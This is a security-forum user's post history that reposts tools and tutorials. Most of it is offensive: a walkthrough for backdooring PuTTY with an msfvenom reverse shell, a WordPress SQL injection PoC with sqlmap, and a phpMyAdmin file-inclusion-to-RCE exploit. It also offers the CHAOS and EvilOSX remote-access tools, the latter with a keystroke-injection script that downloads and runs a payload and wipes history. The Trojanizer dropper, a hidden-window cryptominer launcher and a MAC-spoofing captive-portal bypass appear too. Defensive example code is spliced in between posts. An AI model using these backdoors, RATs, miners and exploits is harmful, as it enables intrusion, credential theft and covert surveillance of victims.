Everything posted by Fi8sVrs

  1. The rest of them? I searched for something serious the other day and found nothing.
  2. Project Cerium: Antivirus. Open Source Antivirus For Humans.
     How to use: clone the repo and run it:
       git clone https://github.com/xedtech/ceriumav.git
       cd ceriumav
       python3 av.py
     Source
  3. WordPress iThemes Security plugin versions prior to 7.0.3 suffer from a remote SQL injection vulnerability.

     # Exploit Title: WordPress Plugin iThemes Security (better-wp-security) <= 7.0.2 - Authenticated SQL Injection
     # Date: 2018-06-25
     # Exploit Author: Alirim Emini
     # Website: https://www.sentry.co.com/
     # Vendor Homepage: https://ithemes.com/
     # Software Link: https://wordpress.org/plugins/better-wp-security/
     # Version/s: 7.0.2 and below
     # Patched Version: 7.0.3
     # CVE : 2018-12636
     # WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

     Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.

     Description: WordPress Plugin iThemes Security (better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.

     Technical details: Parameter orderby is vulnerable because the backend variable $sort_by_column is not escaped.

     File: better-wp-security/core/admin-pages/logs-list-table.php
     Line 271: if ( isset( $_GET['orderby'], $_GET['order'] ) ) {
     Line 272:     $sort_by_column = $_GET['orderby'];

     File: better-wp-security/core/lib/log-util.php
     Line 168: $query .= ' ORDER BY ' . implode( ', ', $sort_by_column );

     Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:
     http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

     Using SQLMAP:
     sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3

     https://packetstormsecurity.com/files/148294/WordPress-iThemes-Security-SQL-Injection.html
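Added example, not part of the advisory or of the plugin's code: the implode-into-ORDER-BY pattern the advisory describes, next to a whitelist-based replacement that rejects the PoC value instead of trying to escape it. The column names are a constructed stand-in for the plugin's log table.

```python
# Added example: unsafe ORDER BY construction (as in the advisory) versus a
# whitelist check. Column names below are constructed for this example and
# are not the plugin's real schema.

# Constructed whitelist of sortable columns for a hypothetical logs table.
ALLOWED_SORT_COLUMNS = {"id", "timestamp", "module", "remote_ip"}
ALLOWED_DIRECTIONS = {"asc", "desc"}

# The 'orderby' value from the advisory's PoC URL, as it arrives in $_GET
# after the web server has URL-decoded the query string (%2c -> ',').
POC_ORDERBY = "remote_ip,(select*from(select(sleep(10)))a)"


def vulnerable_order_by(orderby, order):
    """Mirror of the vulnerable pattern: split the user value on commas and
    implode the pieces straight into the SQL text. Anything the user sends
    becomes part of the query."""
    columns = orderby.split(",")
    return " ORDER BY " + ", ".join(columns) + " " + order


def safe_order_by(orderby, order):
    """Accept only whitelisted column names and sort directions. Unknown
    values are rejected outright rather than escaped: identifiers cannot be
    protected by string escaping, only by matching a fixed set."""
    direction = order.lower()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("invalid sort direction: %r" % order)
    columns = []
    for raw in orderby.split(","):
        name = raw.strip()
        if name not in ALLOWED_SORT_COLUMNS:
            raise ValueError("column not allowed in ORDER BY: %r" % raw)
        columns.append("`%s`" % name)
    if not columns:
        raise ValueError("no sort column given")
    return " ORDER BY " + ", ".join(columns) + " " + direction.upper()


def is_rejected(orderby, order):
    """True when the whitelist check refuses the given orderby/order pair."""
    try:
        safe_order_by(orderby, order)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", vulnerable_order_by(POC_ORDERBY, "asc"))
    print("whitelist rejects PoC:", is_rejected(POC_ORDERBY, "asc"))
    print("whitelist accepts:", safe_order_by("remote_ip,timestamp", "desc"))
```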
  4. jadx-gui --show-bad-code 1.app.apk
  5. Send me a PM with the sites and what you want to change on them.
  6. Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdoor a PE file, in this case the PuTTY client. I used the following software setup: Windows 10 Pro 32 Bit, PuTTY, Stud_PE, Immunity Debugger.

     Before we get our hands into assembly, I want to explain what we will do. We will add a section header named .evil to our file and hijack the file's execution flow. At the entry point we will redirect the execution to our shellcode, and after gaining our shell the ordinary application runs (PuTTY starts).

     #0x01 Adding Section
     At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pretty self-explanatory. I chose a section size of 1500 bytes, which are filled with null bytes. That's more than enough for our shellcode. After saving the file and loading it into Immunity you can see the differences between the two files (the new section .evil is spawned). And if you look at the address of .evil you will see the following (our predefined null bytes) -> Great!

     While checking our new section you may have noticed that the addresses have slightly changed. The last 4 bytes are always null bytes, but the first 4 bytes change with every reload of the file: 00FB0000 <-> 00250000. That's a kernel protection, ASLR; you can find more information about this countermeasure here. This makes some more work, but isn't a problem (more later).

     #0x02 Hijack Execution Flow
     Now we look at the entry point of our file in Immunity. The first instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction, copy the "old" instructions to a text file, because we are going to resume the application flow after executing our shellcode. Mark the first instruction and type "jmp [address of .evil]", in my case "jmp 0x002E3000". After hitting enter you will see the following: Save the changes to a new file and open it in Immunity. Now we take the first instruction with F7 and land in our code cave of null bytes at the .evil address. For our testing purpose we replace the null bytes with NOPs. To do so, just mark all the null bytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instructions pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully).

     Now we do some math to counter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the "old" execution flow. If you look at the entry point of our file, you will see that only the call instruction is missing. Without ASLR enabled we could use the saved address from our text file just like "call x002B8265", but you see that the address of the second instruction "jmp 0x002B7E6E" has also changed... ASLR, hurray! What now? We have to determine the offset between the old addresses to calculate the new overwritten call instruction. Instead of trying to explain the several locations, addresses and relations, I try to show it in the following pictures (if this isn't enough, please tell me via Twitter and I will add text sections). In the end we get the "new" address for our overwritten call instruction, which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instruction at the entry point via "jmp 0x01067FD8" and the execution will flow.

     #0x03 Inject Shellcode
     Choose your favourite shellcode or generate a new one. I used the following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex. Then use the binary paste function of Immunity to replace some of our NOPs with the shellcode. Save the file and voila, you successfully backdoored a PE file! OK, just one thing is missing. The shellcode of msfvenom uses the WaitForSingleObject function and the default values prevent the application from executing until the shell is released. To solve this, change the "DEC ESI" code at the end of the shellcode to a NOP.

     #0x04 PoC
     Start your listener and fire up the application. Thanks for reading, and if you like this post, check my Twitter account please! xD
     Source: hansesecure.de
  7. Author: @Ambulong
     Security Team ChaMd5 disclosed a Local File Inclusion vulnerability in phpMyAdmin latest version 4.8.1, and exploiting this vulnerability may lead to Remote Code Execution. In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.
     VulnSpy's online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/

     Vulnerability Details

     1. Lines 54-63 in file /index.php:

        // If we have a valid target, let's load that script instead
        if (! empty($_REQUEST['target'])
            && is_string($_REQUEST['target'])
            && ! preg_match('/^index/', $_REQUEST['target'])
            && ! in_array($_REQUEST['target'], $target_blacklist)
            && Core::checkPageValidity($_REQUEST['target'])
        ) {
            include $_REQUEST['target'];
            exit;
        }

     2. Core::checkPageValidity in /libraries/classes/Core.php:

        /**
         * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist)
         *
         * checks given $page against given $whitelist and returns true if valid
         * it optionally ignores query parameters in $page (script.php?ignored)
         *
         * @param string &$page     page to check
         * @param array  $whitelist whitelist to check page against
         *
         * @return boolean whether $page is valid or not (in $whitelist or not)
         */
        public static function checkPageValidity(&$page, array $whitelist = [])
        {
            if (empty($whitelist)) {
                $whitelist = self::$goto_whitelist;
            }
            if (! isset($page) || !is_string($page)) {
                return false;
            }
            if (in_array($page, $whitelist)) {
                return true;
            }
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            return false;
        }

     Core::checkPageValidity can be bypassed by using double encoding like %253f.

     Exploit
     An attacker can use this vulnerability to include a session file, leading to Remote Code Execution.
     1. Use username root, password toor to log into phpMyAdmin.
     2. Run the SQL query: select '<?php phpinfo();exit;?>'
     3. Get your Session ID. The Session ID is the item phpMyAdmin in your cookie.
     4. Include the session file:
        http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
     Source: blog.vulnspy.com
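Added example, not phpMyAdmin's code: a Python port of the checkPageValidity() logic quoted above, showing why the double-encoded target passes it, next to a stricter variant (an added hardening, not phpMyAdmin's actual patch). The whitelist is a constructed subset of $goto_whitelist and the session id is a placeholder.

```python
# Added example: port of phpMyAdmin 4.8.1's Core::checkPageValidity() next
# to a stricter check. Whitelist and target values are constructed here.
from urllib.parse import unquote

# Constructed subset of phpMyAdmin's $goto_whitelist.
GOTO_WHITELIST = ["db_sql.php", "index.php", "server_sql.php", "tbl_sql.php"]

# What $_REQUEST['target'] holds for the PoC URL above: PHP already decoded
# the query string once, so "%253f" has become "%3f". The session file name
# is a placeholder, not the id from the post.
POC_TARGET = ("db_sql.php%3f/../../../../../../../../var/lib/php/sessions/"
              "sess_SESSION_ID_PLACEHOLDER")


def _strip_query(page):
    """mb_substr($page, 0, mb_strpos($page . '?', '?')): text before the first '?'."""
    return page.split("?", 1)[0]


def check_page_validity_original(page, whitelist=GOTO_WHITELIST):
    """Port of the 4.8.1 logic: exact match, then match with the query part
    removed, then the same after one more urldecode()."""
    if not isinstance(page, str):
        return False
    if page in whitelist:
        return True
    if _strip_query(page) in whitelist:
        return True
    # Third step: urldecode() turns the literal "%3f" into "?", so
    # "db_sql.php%3f/../.." is cut down to "db_sql.php" and accepted, while
    # index.php later includes the raw, undecoded path.
    decoded = unquote(page)
    if _strip_query(decoded) in whitelist:
        return True
    return False


def check_page_validity_strict(page, whitelist=GOTO_WHITELIST):
    """Added hardened variant: no extra decoding step, no path separators,
    NUL bytes or percent signs anywhere in the value, and the script name
    (before any '?') must match a whitelist entry exactly."""
    if not isinstance(page, str):
        return False
    if any(ch in page for ch in "/\\%\0"):
        return False
    return _strip_query(page) in whitelist


if __name__ == "__main__":
    print("original accepts PoC target:", check_page_validity_original(POC_TARGET))
    print("strict accepts PoC target:  ", check_page_validity_strict(POC_TARGET))
```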
  8. ARPPD - ARP Poisoning Defender
     This is a small script I have written in C to provide protection against malicious ARP attacks changing the gateway's MAC address in the ARP table of a victim's PC.

     How it works
     The program saves the gateway's MAC and IP address when started. It then scans every incoming ARP packet to see if it has the ARP source of the gateway's IP. It blocks these packets (without a delay, like in other ARP defending scripts) using arptables, and instantly updates the ARP table to match the gateway's IP and MAC. It keeps the attacker's MAC address blocked for receiving ARP packets for 5 minutes. When the program exits, it allows all MAC addresses to send ARP packets again (to the PC running the script), as well as flushing the ARP table.

     Cross Platform
     For now, the script only works on Linux. I will try to release a win64 version ASAP.

     Installation and build
     ARPPD needs arptables to run, so just install it:
       sudo apt-get install arptables
     There's a pre-built executable in the builds folder, or build it yourself. To build: run compile_arppd_linux, OR go into the main directory and run:
       gcc -o builds/defender-win64 src-win64/defender.c -lpcap -pthread

     Malicious ARP Packets
     When ARPPD detects a malicious ARP packet, it will look like this:
     Download: ARPPD-master.zip or git clone https://github.com/Prodicode/ARPPD.git
     Source
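Added example, not ARPPD's code: the detection rule the README describes (remember the gateway's IP/MAC pair, flag any ARP packet that claims the gateway IP from another MAC), run over Ethernet/ARP frames constructed inline. Blocking via arptables and rewriting the ARP cache are left out; the addresses are made up for the example.

```python
# Added example: ARP gateway-spoof detection over constructed frames.
# Addresses below are constructed; nothing is sent on a network.
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def mac_text(raw):
    return ":".join("%02x" % b for b in raw)


def ip_bytes(text):
    return bytes(int(x) for x in text.split("."))


def ip_text(raw):
    return ".".join(str(b) for b in raw)


def build_arp_frame(src_mac, dst_mac, op, sender_mac, sender_ip, target_mac, target_ip):
    """Construct an Ethernet II frame carrying an ARP packet (test input only)."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # Ethernet/IPv4, hlen 6, plen 4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if
    the frame is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    hw_type, proto, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if hw_type != 1 or proto != 0x0800 or hlen != 6 or plen != 4:
        return None
    return (op, mac_text(frame[22:28]), ip_text(frame[28:32]),
            mac_text(frame[32:38]), ip_text(frame[38:42]))


class ArpDefender:
    """Holds the gateway IP/MAC pair learned at start-up (ARPPD takes it
    from the ARP table) and flags every ARP packet, request or reply, whose
    sender claims the gateway IP with a different MAC. Flagged MACs are
    kept in `blocked` so a caller could feed them to arptables."""

    def __init__(self, gateway_ip, gateway_mac):
        self.gateway_ip = gateway_ip
        self.gateway_mac = gateway_mac.lower()
        self.blocked = set()

    def inspect(self, frame):
        """Return the offending sender MAC if the frame spoofs the gateway, else None."""
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        _op, sender_mac, sender_ip, _tmac, _tip = parsed
        if sender_ip == self.gateway_ip and sender_mac != self.gateway_mac:
            self.blocked.add(sender_mac)
            return sender_mac
        return None


# Constructed sample traffic.
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "aa:bb:cc:dd:ee:01"
VICTIM_IP = "192.168.1.10"
VICTIM_MAC = "aa:bb:cc:dd:ee:02"
ATTACKER_MAC = "00:11:22:33:44:55"

LEGIT_REPLY = build_arp_frame(GATEWAY_MAC, VICTIM_MAC, ARP_REPLY,
                              GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
SPOOFED_REPLY = build_arp_frame(ATTACKER_MAC, VICTIM_MAC, ARP_REPLY,
                                ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
NOT_ARP = bytes(60)   # all-zero frame, ethertype 0


def run_demo():
    """Feed the sample frames through the defender; returns (verdicts, blocked MACs)."""
    defender = ArpDefender(GATEWAY_IP, GATEWAY_MAC)
    verdicts = [defender.inspect(f) for f in (LEGIT_REPLY, SPOOFED_REPLY, NOT_ARP)]
    return verdicts, sorted(defender.blocked)


if __name__ == "__main__":
    print(run_demo())
```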
  9. CHAOS allows generating payloads and controlling remote Windows systems.

     Disclaimer
     This project was created only for learning purpose. THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

     Features
     - Reverse Shell
     - Download File
     - Upload File
     - Screenshot
     - Keylogger
     - Persistence
     - Open URL Remotely
     - Get Operating System Name
     - Run Fork Bomb

     Tested On
     Kali Linux - ROLLING EDITION

     How To Use
       # Install dependencies (You need Golang and UPX package installed)
       $ apt install golang xterm git upx-ucl -y
       # Clone this repository
       $ git clone https://github.com/tiagorlampert/CHAOS.git
       # Get and install external imports (requirement to screenshot)
       $ go get github.com/kbinani/screenshot && go get github.com/lxn/win
       $ go install github.com/kbinani/screenshot && go install github.com/lxn/win
       # Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
       # It occurs because the libraries are for Windows systems, but it is necessary to build the payload.
       # Go into the repository
       $ cd CHAOS
       # Run
       $ go run CHAOS.go

     Screenshot (outdated)
     Source
  10. TROJANIZER
      Version release: v1.1 (Stable)
      Author: pedro ubuntu [ r00t-3xp10it ]
      Codename: Troia_Revisited
      Distros Supported: Ubuntu, Kali, Mint, Parrot OS
      Suspicious-Shell-Activity (SSA) RedTeam develop @2017

      FRAMEWORK DESCRIPTION
      The Trojanizer tool uses WinRAR (SFX) to compress the two files input by the user, and transforms them into an SFX executable (.exe) archive. The SFX archive, when executed, will run both files (our payload and the legit application at the same time). To make the archive less suspicious to the target at execution time, Trojanizer will try to replace the default icon (.ico) of the SFX file with a user-selected one, and suppress all SFX archive sandbox messages (Silent=1 | Overwrite=1). 'Trojanizer will not build trojans, but from the target's perspective, it replicates the trojan behavior' (execute the payload in the background, while the legit application executes in the foreground).

      DEPENDENCIES (backend applications)
      Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
      "Trojanizer.sh will download/install all dependencies as they are needed"

      It is recommended to edit and config the option SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.

      PAYLOADS (agents) ACCEPTED
      .exe | .bat | .vbs | .ps1
      "All payloads that windows/SFX can auto-extract-execute"
      HINT: If 'SINGLE_EXEC=ON' is selected in the settings file, then Trojanizer will accept any kind of extension to be input.

      LEGIT APPLICATIONS ACCEPTED (decoys)
      .exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
      "All applications that windows/SFX can auto-extract-execute"

      Advanced Settings: Trojanizer and APPL Whitelisting Bypasses
      Framework Screenshots
      Video Tutorials: Trojanizer - AVG anti-virus fake installer (trojan behavior); Trojanizer - single_file_execution (not trojan behavior)

      Download/Install
      1º - Download framework from github
           git clone https://github.com/r00t-3xp10it/trojanizer.git
      2º - Set files execution permissions
           cd trojanizer
           sudo chmod +x *.sh
      3º - config framework
           nano settings
      4º - Run main tool
           sudo ./Trojanizer.sh
      Source
  11. While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers.

      About the Speakers

      Matt Knight
      Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.

      Ryan Speers
      Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, micro controllers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC

      link: https://www.troopers.de/troopers18/agenda/rgdyd3/
  12. Hidden.vbs
        Set WshShell = CreateObject("WScript.Shell")
        WshShell.Run Chr(34) & "miner.bat" & Chr(34), 0
        Set WshShell = Nothing
      Miner.bat
        minergate-cli --user email@gmail.com --xmr 1
      Minergate: https://minergate.com
      Source: fsecu
  13. AlphaBay Market was by far the largest and most prolific provider of cyber crime and fraudulent services in the world prior to its seizure by the FBI on July 4, 2017. While the Tor-based marketplace was most famous for the sale of narcotics, firearms, and stolen goods, AlphaBay’s forum was the epicenter of the English-speaking cyber criminal community. During the site’s tenure, it provided a rich source of intelligence on the tactics, techniques, and operations of cyber criminal groups targeting a wide range of corporations and selling exfiltrated data through the marketplace securely and anonymously. This included visibility into the attack cycle, AlphaBay operating as a bridge between the English and Russian language cyber criminal communities, and the likely role of AlphaBay’s administrators in cryptocurrency market manipulation on a large scale. This presentation will discuss iDefense’s research into AlphaBay Market as a case study on how in-depth analysis of underground communities can contribute to an organization’s security posture. It will provide a detailed discussion of the tradecraft and methodologies used for underground intelligence, such as the use of undercover personas and how to apply social engineering techniques to gain additional intelligence. It will also discuss the strengths and weaknesses of such an approach and the risks associated with cyber underground collection. Finally, the case study will present lessons learned from engagement and analysis of criminal underground communities and how attendees can integrate cyber underground intelligence into their threat intelligence program. Christy Quinn (@ChristyQuinn), Security Specialist – Cyber Threat Intelligence, iDefense – Accenture Security
  14. EvilOSX
      A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.

      Features
      - Emulate a simple terminal instance
      - Undetected by anti-virus (OpenSSL AES-256 encrypted payloads, HTTPS communication)
      - Multi-threaded
      - No client dependencies (pure python)
      - Persistent
      - Simple extendable module system
      - Retrieve Chrome passwords
      - Retrieve iCloud tokens and contacts
      - Phish for iCloud passwords via iTunes
      - Download and upload files
      - Take a picture using the webcam
      - Record microphone input
      - iTunes iOS backup enumeration
      - Retrieve or monitor the clipboard
      - Retrieve browser history (Chrome and Safari)
      - Attempt to get root via local privilege escalation
      - Auto installer, simply run EvilOSX on your target and the rest is handled automatically

      How To Use
      The server side requires python3 to run (probably already installed on your system).
        # Clone or download this repository
        $ git clone https://github.com/Marten4n6/EvilOSX
        # Install dependencies required by the server
        $ sudo pip3 install -r requirements.txt
        # Go into the repository
        $ cd EvilOSX
        # Build a launcher to infect your target
        $ python builder.py
        # Start listening for connections
        $ python start.py
        # Lastly, run the built launcher on your target
      Because payloads are created unique to the target system (automatically by the server), the server must be running when any client connects for the first time.

      Motivation
      This project was created to be used with my Rubber Ducky, here's the simple script:
        REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
        REM Also see https://ducktoolkit.com/vidpid/
        DELAY 1000
        GUI SPACE
        DELAY 500
        STRING Termina
        DELAY 1000
        ENTER
        DELAY 1500
        REM Kill all terminals after x seconds
        STRING screen -dm bash -c 'sleep 6; killall Terminal'
        ENTER
        STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
        ENTER
      Takes about 10 seconds to backdoor any unlocked Mac, which is... nice.
      Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.
      Source
  15. SHADOW-BOX
      Lightweight Hypervisor-Based Kernel Protector

      Introduction of Shadow-Box
      Shadow-box is a security monitoring framework for operating systems using state-of-the-art virtualization technologies. Shadow-box has a novel architecture inspired by a shadow play. We made Shadow-box from scratch, and it is primarily composed of a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-Watcher, places event monitors on static kernel elements and tests security of dynamic kernel elements. Shadow-box manipulates address translations from the guest physical address to the host physical address in order to exclude unauthorized accesses to the host and the hypervisor spaces. In that way, Shadow-box can properly introspect the guest operating system and mediate all accesses, even when the operating system is compromised.

      Architecture of Shadow-Box
      We explain how we designed the Light-box and the Shadow-watcher. It is designed to support a lightweight and practical security monitoring framework using virtualization technologies. We developed a security monitoring framework, Shadow-box, that keeps an OS safe by filtering out unauthorized accesses to important kernel elements and defending the integrity of kernel elements periodically. Shadow-box relies upon its two subparts: a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine, so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-watcher, places event monitors on static kernel elements and tests security of dynamic kernel elements. Running inside the host, it can test the security of the guest without malicious interference even when the guest OS is compromised.

      If you want to know more about Shadow-box, please see my presentation and paper at Black Hat Asia 2017 and HITBSecConf 2017.

      Download: shadow-box-for-x86-master.zip or git clone https://github.com/kkamagui/shadow-box-for-x86.git
      Source
  16. Facebook-Video-Downloader
      Version 1.0.0
      Facebook Video Downloader (CLI) For Linux Systems, Coded in PHP

      How To Use:
        git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader
        cd Facebook-Video-Downloader
        php fb.php
      Enter the URL, for example ( https://www.facebook.com/cctvcom/videos/1410869539034155/ ), enter the file name, DONE.

      Mirror: fb.php

        <?php
        // Fetch a URL with a desktop browser User-Agent, following redirects.
        function curl($url)
        {
            $curl = curl_init($url);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13");
            curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
            $content = curl_exec($curl);
            curl_close($curl);
            return $content;
        }

        system("clear");
        echo "\n FACEBOOK VIDEO DOWNLOADER\n VERSION 1.0.0 CREATED BY R3D#@X0r\n";
        echo "\n\n";
        echo "[#] Enter Video URL (https://www.facebook.com/user/video/id) : ";
        $v = trim(fgets(STDIN, 1024));
        echo "\n\n[#] Enter Video Name To Save As : ";
        $name = trim(fgets(STDIN, 1024));

        // The mobile (mbasic) site exposes the raw video URL in a redirect link.
        $url = str_replace('www', 'mbasic', $v);
        $s = curl($url);
        //echo $s;
        $vurl = preg_match('/<a href=\"\/video_redirect\/\?src\=(.*?)\"/ims', $s, $matches) ? $matches[1] : null;
        if ($vurl === null) {
            echo "\n\n[-] No video URL found in the page.\n\n";
            exit(1);
        }
        $vu = urldecode($vurl);

        echo "\n\n[+] Downloading... \n\n\n";
        // $name comes from the user and $vu from remote HTML; both are quoted with
        // escapeshellarg() so shell metacharacters cannot alter the wget command.
        $d = 'wget -O ' . escapeshellarg($name . '.mp4')
           . ' --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" '
           . escapeshellarg($vu) . ' -q --show-progress';
        system($d);
        echo "\n\n[+] Done.. Saved As : " . $name . ".mp4\n\n";
        exit(0);
        ?>

      Source
  17. Apple is worried about the battery drain from background cryptocurrency mining.

      Apple recently announced new restrictions on the use of cryptocurrencies on iPhones and iPads, a change first noticed by Apple Insider on Monday. "Apps may not mine for cryptocurrencies unless the processing is performed off device," Apple's app store guidelines for iOS now say. This requirement was absent from the same document just a few weeks ago.

      Apple's new policy is apparently motivated in part by concerns that cryptocurrency mining could drain the batteries of mobile devices. "Apps, including any third party advertisements displayed within them, may not run unrelated background processes, such as cryptocurrency mining," the policy states.

      Websites have been battling this issue for months: people submitting scammy ads to ad networks that hijack the user's CPU to mine cryptocurrency and send the profits back to the admaker. YouTube was briefly serving up these ads before Google noticed the problem and banned the ads.

      But Apple's new policy seems to go beyond obviously abusive cases of surreptitious cryptocurrency mining. The guidelines ban any on-device mining—even if users deliberately download an app whose explicit purpose is to mine for cryptocurrency.

      Devices running iOS are not likely to qualify as good mining hardware anyway. Bitcoin cryptocurrency mining has long been dominated by custom ASIC chips. Some other cryptocurrencies are designed to be ASIC-resistant, but even these are predominantly mined on high-end graphics cards with ample processing power and memory. An iPhone or iPad doesn't offer very much raw computing power per dollar, so it probably wouldn't make sense for someone to buy an iPhone or iPad to use as a mining device.

      Apple guidelines also now state that cryptocurrency apps "may not offer currency for completing tasks, such as downloading other apps, encouraging other users to download, posting to social networks."

      Apple's new policy takes effect at a time of growing concern over scammy behavior in the cryptocurrency world. Google and Facebook both banned cryptocurrency ads from their ad networks earlier this year. And the Securities and Exchange Commission has become increasingly aggressive about shutting down initial coin offerings that are fraudulent or otherwise break the law.

      Via arstechnica.com
  18. Free Wifi
      This short tutorial describes a few methods for gaining access to the Internet, a basic human right, from public wireless networks. This tutorial has been tested on Mac and a Raspberry Pi. It should generally work on Linux, and hasn't been tested on Windows.

      Preparation
      Make sure you do this step before you are stuck without Internet access: Install Python pip. On Linux, install the Python Developer package, a dependency for the netifaces package.
        Ubuntu: $ sudo apt-get install python-dev
        Fedora: $ sudo dnf install python-devel
      Note: For CentOS, substitute dnf with yum.
      Make a copy of this repository and install dependencies for the script:
        $ git clone https://github.com/kylemcdonald/FreeWifi
        $ cd FreeWifi && sudo pip install -r requirements.txt

      How to get additional time
      If you had free internet access but your time has run out, the first thing to try is to open an incognito/private window. Here are instructions for a few browsers: Chrome (mobile and desktop), Safari for iOS, Safari for Mac, Microsoft Edge. An incognito/private window will temporarily clear any cookies that may have been used for tracking how much time you spent online, making you look like a "new user" and allowing you to log into the wireless portal again.

      Unfortunately, most systems track MAC addresses instead of cookies. A MAC address is a unique identifier assigned to every network interface. This means you need to get a new MAC address to get additional time. Fortunately, MAC addresses can be changed in software, without swapping the hardware. The spoof-mac command line utility makes this easy by entering sudo spoof-mac randomize Wi-Fi. If the command fails to run, try entering spoof-mac list --wifi to check what the name of your wireless device is first, and use that manually. After randomizing your MAC, try logging into the wireless portal again. When you're done using the Internet, run sudo spoof-mac reset Wi-Fi to reset your MAC address.

